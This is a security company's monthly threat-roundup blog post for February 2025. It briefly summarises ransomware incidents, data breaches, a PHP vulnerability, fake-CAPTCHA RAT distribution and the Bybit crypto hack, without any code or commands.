DigitalXRAID

Threat Pulse – February 2025

Each month, DigitalXRAID’s Security Operations Centre (SOC) analysts share the top threats affecting businesses globally. Take action to protect your organisation against these prolific threats. 

If you’ve been affected by any of these threats, we’re here to help. You can call our Cyber Emergency line any time of the day or night for help with active cyberattacks.

DigitalXRAID’s SOC analysts constantly monitor for zero-day threats and update our signature databases using the largest Open Threat Exchange database available. 

Lee Enterprises Cyberattack  

The parent company of the Richmond Times-Dispatch suffered a cyberattack attributed to the Russian-linked Qilin group. The incident disrupted operations across multiple newspapers, leading to reduced editions and missing features for about a month. 

Exploitation of PHP Vulnerability  

Attackers actively exploited a critical remote code execution vulnerability (CVE-2024-4577) in PHP, patched in June 2024. This flaw affected Windows servers using Apache and PHP-CGI, highlighting the risks of unpatched systems. 

Genea Fertility Clinic Data Breach  

On February 26, 2025, Genea, an Australian IVF and fertility services provider, confirmed a data breach involving the Termite ransomware group. The breach exposed approximately 940.7GB of sensitive patient data, including personal details such as names, contact information, Medicare numbers, medical histories, and test results.

Financial data were reportedly not compromised. Genea has obtained a court injunction to prevent further dissemination of the stolen information and is collaborating with cybersecurity authorities to address the incident. 

Insider Risk Concerns in U.S. Government  

The Department of Government Efficiency (DOGE) faced scrutiny over potential insider threats due to rapid onboarding processes. Experts warned that the department’s structure could lead to significant security gaps. 

Ransomware Attack on HCRG Care Group  

HCRG Care Group, a UK-based provider of health and social care services, fell victim to a ransomware attack by the cybercrime group Medusa. The attack led to unauthorised access to sensitive patient data, though specific details regarding the compromised information have not been publicly disclosed. The incident highlights the ongoing threat of ransomware attacks targeting healthcare organisations. 

IoT Data Breach Exposing Billions of Records  

A significant data breach involving Internet of Things (IoT) devices exposed approximately 2.7 billion records. The breach raised concerns about the security of IoT devices and the vast amounts of data they generate. 

8Base Ransomware Gang Disruption  

Law enforcement agencies arrested four individuals connected to the 8Base ransomware gang and seized 27 of their servers. The group targeted organisations in the U.S. and Brazil, employing a double-extortion model. 

AI Platform Breaches and Data Misuse Concerns  

February saw breaches involving AI platforms, raising concerns about data misuse and security vulnerabilities. These incidents highlighted the need for robust cybersecurity measures in emerging technologies. 

Remote Access Trojans (RATs)

The distribution of Remote Access Trojans, such as NetSupport RAT, was prevalent in February 2025. Attackers injected fake CAPTCHA pages into compromised websites, prompting users to execute malicious PowerShell commands that downloaded and executed the NetSupport RAT, granting attackers remote control over infected systems. 

Meta confirms WhatsApp spyware hack 

Facebook owner Meta confirmed that a hacking attack impacted users of the WhatsApp secure messaging platform. As first reported by The Guardian, WhatsApp users were targeted by a sophisticated spyware attack, affecting a number of users including journalists and members of civil society. 

DragonForce Ransomware Attack on Saudi Real Estate Firm

On February 14, 2025, the DragonForce ransomware group targeted a prominent real estate and construction company in Riyadh, Saudi Arabia. The attackers exfiltrated approximately 6 terabytes of data, including sensitive project details and financial records. They set a ransom deadline just one day before the start of Ramadan, leveraging cultural and religious events to pressure the victim into paying the ransom. 

IMI Engineering Group Cyberattack

IMI, a UK-based engineering company, detected unauthorised access to its systems in mid-February 2025. The company engaged external cybersecurity experts to investigate the breach, which led to a 1.2% drop in its share price. This incident followed a similar attack on its competitor, Smiths Group, earlier in the year. 

Lazarus Group’s Suspected Involvement in Major Crypto Exchange Hack  

In February 2025, the Dubai-based cryptocurrency exchange Bybit suffered a hack resulting in the loss of 400,000 Ethereum, valued at approximately $1.5 billion. Industry analysts suspect the North Korea-linked Lazarus Group was responsible for this breach, marking one of the largest cryptocurrency exchange hacks to date. 

ENGlobal Cybersecurity Breach 

ENGlobal, an energy sector contractor, experienced a cybersecurity breach that drew attention to the sector’s vulnerabilities. The attack highlighted the energy industry’s susceptibility due to its legacy infrastructure, making it a prime target for cyber adversaries seeking to exploit potential weaknesses. 

Modat Researchers Uncover AMS Vulnerabilities 

In early 2025, Modat researchers conducted a comprehensive investigation, uncovering widespread internet exposure of Automated Manifest System (AMS) installations. This exposure revealed significant security vulnerabilities impacting organisations globally, including those in the construction sector. The flaws posed serious risks to data integrity and physical security, highlighting the urgent need for improved safeguards and stricter oversight. The vulnerabilities led to the exposure of hundreds of thousands of highly sensitive employee records, including personal identification details, biometric information, photographs, and work schedules. 

DigitalXRAID exists to ensure that the bad guys don’t win. We’re driven and motivated to protect customers. Our expertise and unrivalled service means we can take care of your security, whilst you take care of business.    

Talk to the team to see how you can start protecting your business against cyberattacks today. 

Previous Article

Top 10 Cyber Security Challenges for Businesses

Next Article

Cyber Essentials vs Cyber Essentials Plus

Protect Your Business & Your Reputation.

With a continued focus on security, you can rest assured that breaches and exploits won't be holding you back.

Speak To An Expert

cybersecurity experts
x

Get In Touch

[contact-form-7 id="5" title="Contact Us Form"]
DigitalXRAID
Privacy Overview

This website uses cookies so that we can provide you with the best user experience possible. Cookie information is stored in your browser and performs functions such as recognising you when you return to our website and helping our team to understand which sections of the website you find most interesting and useful.